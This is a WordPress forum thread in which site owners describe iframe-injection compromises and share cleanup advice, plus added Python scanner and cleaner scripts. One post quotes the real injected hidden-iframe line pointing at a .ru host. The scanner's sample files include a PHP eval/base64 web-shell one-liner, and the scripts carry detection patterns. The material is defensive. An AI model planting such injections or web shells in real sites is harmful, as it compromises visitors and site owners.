Forums

Exploits and GoDaddy (14 posts)

  1. kendoori
    Member
    Posted 6 months ago #

    Until yesterday I was running 2.3, and experienced several exploits over the past few weeks (the site is hosted at GoDaddy). Several PHP files were compromised in these attacks, and the pattern was that an iframe was appended to the files. I have good backups and was quickly able to replace the infected files in each case, only to find several days later that they were once again hit.

    After reading up on this, I upgraded to 2.7.1 yesterday.

    Today, upon login to the admin pages, my on-access AV scanner picked up a reference to gumblar.cn/rss, and on subsequent logins I was warned of .js files associated with the embedded-link-with-video plugin having the JS:Redirector-H2 [Trojan].

    Since I was not able to observe any changes to WP files when I examined them with FTP, I suspect that the gumblar reference was somehow just cached in my browser; I cleared the cache and seem to be clear. I also deactivated the errant plugin.

    I'm curious whether others are experiencing the same, and what steps are being taken to harden sites (especially on GoDaddy). I've contacted their support, but with no response yet.

  2. whooami
    Member
    Posted 6 months ago #

    If you have been running 2.3.x you were wide open to a whole host of exploits -- the very least of which is a JavaScript iframe attack. Hopefully you have done more than upgrade to ensure your site is secure.

  3. kendoori
    Member
    Posted 6 months ago #

    Thanks whooami, can you be more specific?

  4. esmi
    Member
    Posted 6 months ago #

  5. whooami
    Member
    Posted 6 months ago #

    Here goes the standard reply,

    fix advice:
    http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/
    http://wordpress.org/search/hacked?forums=1

    Make sure that your files on the server are clean. If that means deleting and re-uploading, then you ought to do that. Files that you don't replace should be looked at closely.

    Check for files that don't belong, directories that don't belong. Image files with changed timestamps -- look at those. It's VERY common for there to be scripts on sites that are named in such a way as to mask the fact that they're scripts.

    Be suspicious when you're looking at things.

    Look at your permissions. Do you have world-writable files? Any world-writable directories? Are they necessary?

    You need to check your database. Look for rogue plugins being loaded, look for rogue users (specifically look for a user named wordpress). You will NOT see rogue plugins or rogue users in your wp-admin/ area. You need to check your database.

    Make sure ALL of your plugins are current.

    Make sure your WordPress is current.

    Change your mysql password that wordpress uses (update your wp-config.php with that new password).

    Change any admin level passwords on your blog.

    Look at any other software thats being used on your site. Is it current?

    That's just an outline and not a complete list.

    There's quite a bit to do, but it's all necessary.
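
A triage pass over the checks whooami lists (files and directories that don't belong, scripts disguised as images, injected iframes and hidden divs, world-writable paths, recently modified files, and the active_plugins entry in the database), written as an added example; it is not code from this thread, from WordPress, or from any plugin. It assumes you have pulled a copy of the install tree down over FTP and are scanning that copy, and that you have pasted the value of the active_plugins row from wp_options into it; the sample install it builds is constructed here, and example.invalid is a placeholder host. Rogue users can only be found in the database, so those queries are given as comments rather than code.

```python
import os
import re
import stat
import tempfile
import time

# Indicators from the thread: off-site iframes (often inside a hidden div), PHP
# obfuscation calls, PHP tags inside "image" files, world-writable paths, and
# files touched recently. Matching is deliberately loose: this is triage, not a verdict.
IFRAME_RE = re.compile(r'<iframe\b[^>]*\bsrc\s*=', re.I)
HIDDEN_DIV_RE = re.compile(r'<div\s+style\s*=\s*["\']?\s*display\s*:\s*none', re.I)
OBFUSCATION_RE = re.compile(r'\b(eval|base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(', re.I)
PHP_TAG_RE = re.compile(r'<\?php', re.I)
CODE_EXT = {'.php', '.js', '.html', '.htm', '.inc'}
MEDIA_EXT = {'.jpg', '.jpeg', '.gif', '.png', '.ico', '.css'}   # should never contain PHP


def scan_tree(root, recent_days=7, now=None):
    """Walk a local copy of the install and return sorted (relative_path, reason) findings."""
    now = time.time() if now is None else now
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames:
            full = os.path.join(dirpath, name)
            if os.stat(full).st_mode & stat.S_IWOTH:
                findings.append((os.path.relpath(full, root), 'world-writable directory'))
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            st = os.stat(full)
            if st.st_mode & stat.S_IWOTH:
                findings.append((rel, 'world-writable file'))
            if now - st.st_mtime < recent_days * 86400:
                findings.append((rel, 'modified in last %d days' % recent_days))
            with open(full, 'rb') as fh:
                data = fh.read().decode('latin-1')      # never raises on binary content
            ext = os.path.splitext(name)[1].lower()
            if ext in MEDIA_EXT and PHP_TAG_RE.search(data):
                findings.append((rel, 'PHP code inside a non-script file'))
            if ext in CODE_EXT:
                for regex, reason in ((IFRAME_RE, 'injected iframe'),
                                      (HIDDEN_DIV_RE, 'hidden div'),
                                      (OBFUSCATION_RE, 'obfuscation call')):
                    if regex.search(data):
                        findings.append((rel, reason))
    return sorted(findings)


# The plugin list wp-admin shows is built from the same row, so a plugin that hides
# itself is still visible in the raw data. Pull it (and the users) straight from MySQL:
#   SELECT option_value FROM wp_options WHERE option_name = 'active_plugins';
#   SELECT ID, user_login, user_email, user_registered FROM wp_users;
SERIALIZED_STR = re.compile(r's:(\d+):"')


def parse_active_plugins(option_value):
    """Extract the string members of a PHP-serialized array using their length prefixes."""
    plugins, pos = [], 0
    while True:
        m = SERIALIZED_STR.search(option_value, pos)
        if m is None:
            return plugins
        length, start = int(m.group(1)), m.end()
        plugins.append(option_value[start:start + length])
        pos = start + length + 2            # skip the closing quote and ';'


def rogue_plugins(option_value, plugins_dir):
    """Active plugins whose file is missing or resolves outside wp-content/plugins."""
    base = os.path.realpath(plugins_dir)
    rogue = []
    for rel in parse_active_plugins(option_value):
        full = os.path.realpath(os.path.join(base, rel))
        if not full.startswith(base + os.sep) or not os.path.isfile(full):
            rogue.append(rel)
    return rogue


def build_sample_tree():
    """Constructed sample install (not a real site) that trips each check once."""
    root = tempfile.mkdtemp(prefix='wp-triage-')
    injected = ('</body>\n<div style="display:none"><iframe src="http://example.invalid/index.php"'
                ' width=1 height=1></iframe></div>\n</html>\n')
    files = {
        'index.php': '<?php require "./wp-blog-header.php"; ?>\n',
        'wp-content/plugins/akismet/akismet.php': '<?php /* Plugin Name: Akismet */ ?>\n',
        'wp-content/themes/default/footer.php': injected,
        'wp-content/uploads/logo.jpg': '\xff\xd8\xff<?php eval(base64_decode($_POST["c"])); ?>',
    }
    old = time.time() - 30 * 86400
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, 'w', encoding='latin-1') as fh:
            fh.write(body)
        os.chmod(full, 0o644)
        if rel.endswith(('index.php', 'akismet.php')):      # untouched core/plugin files
            os.utime(full, (old, old))
    for dirpath, dirnames, _ in os.walk(root):
        for name in dirnames:
            os.chmod(os.path.join(dirpath, name), 0o755)
    os.chmod(os.path.join(root, 'wp-content', 'uploads'), 0o777)  # the classic shared-host mistake
    return root


if __name__ == '__main__':
    root = build_sample_tree()
    for path, reason in scan_tree(root):
        print('%-45s %s' % (path, reason))
    print(rogue_plugins('a:2:{i:0;s:19:"akismet/akismet.php";i:1;s:19:"../uploads/logo.jpg";}',
                        os.path.join(root, 'wp-content', 'plugins')))
```

Core files and legitimate embed plugins will trip the obfuscation and iframe patterns too, so compare each hit against a pristine download of the same WordPress version rather than treating every line as an infection; the point of the scan is to shorten the list of files that need a human look, not to replace it.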

  6. GDHosting
    Member
    Posted 6 months ago #

    kendoori,

    I see a lot of great advice here. I also wanted to pipe in and let you know that we can take a look to see if we can identify the source of the issue you're experiencing. If you provide the domain name, I will follow up on the support ticket you submitted.

  7. kendoori
    Member
    Posted 6 months ago #

    GDHosting, I'd prefer to not mention the domain publicly. My GD Support ticket references Incident ID: 6153133

    They just suggested I use a stronger FTP password, which I will do.

  8. GDHosting
    Member
    Posted 6 months ago #

    Thanks for the update. Let me know if I can help in any other way.

  9. kikolani
    Member
    Posted 6 months ago #

    I just had a run in with this exploit over the weekend as well, and wrote about it here: PHP Script Injection Exploit in WordPress 2.7.1. I cover how it was detected and resolved.

    Also, while I'm sure it can happen with other hosts as well, my site is also hosted with GoDaddy.

  10. ryan_accuwebhosting
    Member
    Posted 5 months ago #

    This is a very common issue with WordPress. WordPress is not more secure, and hence you must take some measures to protect your blog:

    1) Always upgrade to the latest version. This closes a lot of holes.
    2) Upgrade all the plugins to their latest versions.
    3) Use a strong password.
    4) Do not use unknown plugins. Deactivate and remove any you are using.

  11. digitalrenewal
    Member
    Posted 5 months ago #

    I was hit with this one too, pretty bad. As I design sites and build custom themes, many of my clients were hit as well. Avast antivirus (free) is really good at picking up this particular virus on your machine and through Firefox.

    Thanks kikolani, for your post. Looks like I don't have to delete entire installs anymore :) Phew!

    Also, I found 2 plugins that might help to secure WP better:
    Secure WordPress for the basics and User Locker to guard against brute-force attacks.

    Best of luck to everyone, this virus is a pain in the rump.

  12. Laburriniorg
    Member
    Posted 4 months ago #

    The iframe hack hit me too, just one hour ago.
    I'm also hosting at GoDaddy, at www.sarahburrini.com
    And I'm using Comicpress...

    I just want to know if there's anything I can do even if I:
    1) Did not upgrade to WordPress 2.8 (still at 2.7.1)
    2) Did not back up BEFORE I was hacked (I know, this will teach me)
    BUT
    I know WHEN my site was hacked, which also lets me see which files are infected.

    So, is it of any use to reinstall a new WordPress version (2.8) plus the Comicpress theme, exchange all the infected files and upload my database again?

    Please please help! I put so much work into my webcomics site *sniff*
    Thanks in advance!!

  13. carrierawks
    Member
    Posted 2 months ago #

    I was hacked by the "Saudi Arabia Hackers" and I am running the latest version of WordPress. What I am wondering is whether they broke into my website or my email. I am guessing the backend of my site, because I received an email stating that my admin password had been Lost/Changed, and now suddenly I cannot receive my password.

    Maybe there is a major problem with the 2.8.4 version of WordPress? I am not entirely sure, and it's kind of weird to me. And very random, since my site isn't very popular at all.

  14. vinz77
    Member
    Posted 2 months ago #

    Hello,
    I suffered from the same. I'm copying my M.O. here, which worked.
    I got
    /homepages/4/d134610354/htdocs/moebius77/blog2/wp-includes/default-widgets.php on line 423 as an error on my blog. No way to log in or anything. So:
    1) Re-install your whole WordPress blog: FTP it onto the server again, EXCEPT the wp-content folder if you want to keep your images and themes.
    2) Now you should be able to log in. Go to your dashboard and install the plugin "Script Exploiter".
    3) Run the plugin and look for malicious script. In my case, I had this baby:
    <div style="display:none"><iframe src="http://past-another-life.ru:8080/index.php" width=571 height=464 ></iframe></div>
    copied into most of my install.php files, into all the themes (default, etc.), into the plugins and others.
    4) Download the files with the added script, open them with an editor and erase all the garbage.
    5) FTP them back onto the server; you should be all right.
    Cheers, hope this helps,
    Vinz
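
Steps 3 to 5 of the M.O. above done in one pass over a downloaded copy of the site, as an added example; it is not vinz77's code and not the Script Exploiter plugin. It strips the hidden-div-plus-iframe shape quoted in the post from every PHP, HTML and JS file under a directory, keeps a .bak copy of each file it changes, and reports files that still contain an <iframe> afterwards so they get a manual look. The sample files are constructed here and example.invalid is a placeholder host. Step 1 (re-uploading core from a fresh download) still matters, since the cleaner only removes what it recognises and a parse error like the default-widgets.php one means something it does not recognise may be there too.

```python
import os
import re
import shutil
import tempfile

# Shape of the injection quoted above: a hidden <div> wrapping an off-site <iframe>.
# Host, size and attribute order vary between sites, so match the structure, not the string.
INJECTION_RE = re.compile(
    r'<div\s+style\s*=\s*["\']?\s*display\s*:\s*none\s*["\']?\s*>\s*'
    r'<iframe\b[^>]*>\s*</iframe>\s*</div>[ \t]*\r?\n?',
    re.IGNORECASE)
LEFTOVER_RE = re.compile(r'<iframe\b', re.IGNORECASE)
SCRIPT_EXT = ('.php', '.html', '.htm', '.js')


def strip_injection(text):
    """Return (cleaned_text, removed_count) for one file's contents."""
    return INJECTION_RE.subn('', text)


def clean_file(path):
    """Strip injections in place (keeping path.bak); return (removed, still_has_iframe)."""
    with open(path, 'rb') as fh:
        text = fh.read().decode('latin-1')          # byte-preserving round trip
    cleaned, removed = strip_injection(text)
    if removed:
        shutil.copy2(path, path + '.bak')
        with open(path, 'wb') as fh:
            fh.write(cleaned.encode('latin-1'))
    return removed, bool(LEFTOVER_RE.search(cleaned))


def clean_tree(root):
    """Clean every script file under root; return ({relpath: removed}, [files to review])."""
    removed, review = {}, []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(SCRIPT_EXT):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            n, leftover = clean_file(full)
            if n:
                removed[rel] = n
            if leftover:
                review.append(rel)       # an iframe the pattern did not recognise
    return removed, sorted(review)


def build_sample_tree():
    """Constructed sample files (not from any real site) exercising the cleaner."""
    root = tempfile.mkdtemp(prefix='wp-clean-')
    inj = ('<div style="display:none"><iframe src="http://example.invalid:8080/index.php" '
           'width=571 height=464 ></iframe></div>')
    samples = {
        'wp-admin/install.php': '<?php\n// installer\n?>\n' + inj + '\n',
        'wp-content/themes/default/footer.php': '</body>\n' + inj + '\n' + inj + '\n</html>\n',
        'wp-content/themes/default/header.php': '<html><body>\n',
        'wp-content/plugins/demo/demo.js':
            'document.write(\'<iframe src="http://example.invalid/x.php"></iframe>\');\n',
        'wp-content/uploads/logo.jpg': 'JFIF ' + inj,     # not a script extension: left alone
    }
    for rel, body in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, 'w', encoding='latin-1') as fh:
            fh.write(body)
    return root


def file_text(root, rel):
    """Read back a file under root (used to confirm what the cleaner wrote)."""
    with open(os.path.join(root, rel), 'rb') as fh:
        return fh.read().decode('latin-1')


if __name__ == '__main__':
    root = build_sample_tree()
    removed, review = clean_tree(root)
    print('cleaned:', removed)
    print('review by hand:', review)
```

Run it on the downloaded copy, diff a few of the .bak files against their cleaned versions to confirm only the injected block went, then upload the cleaned tree; anything in the review list (the demo.js case above, an iframe that is not wrapped the way the pattern expects) is opened by hand before it goes back up.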
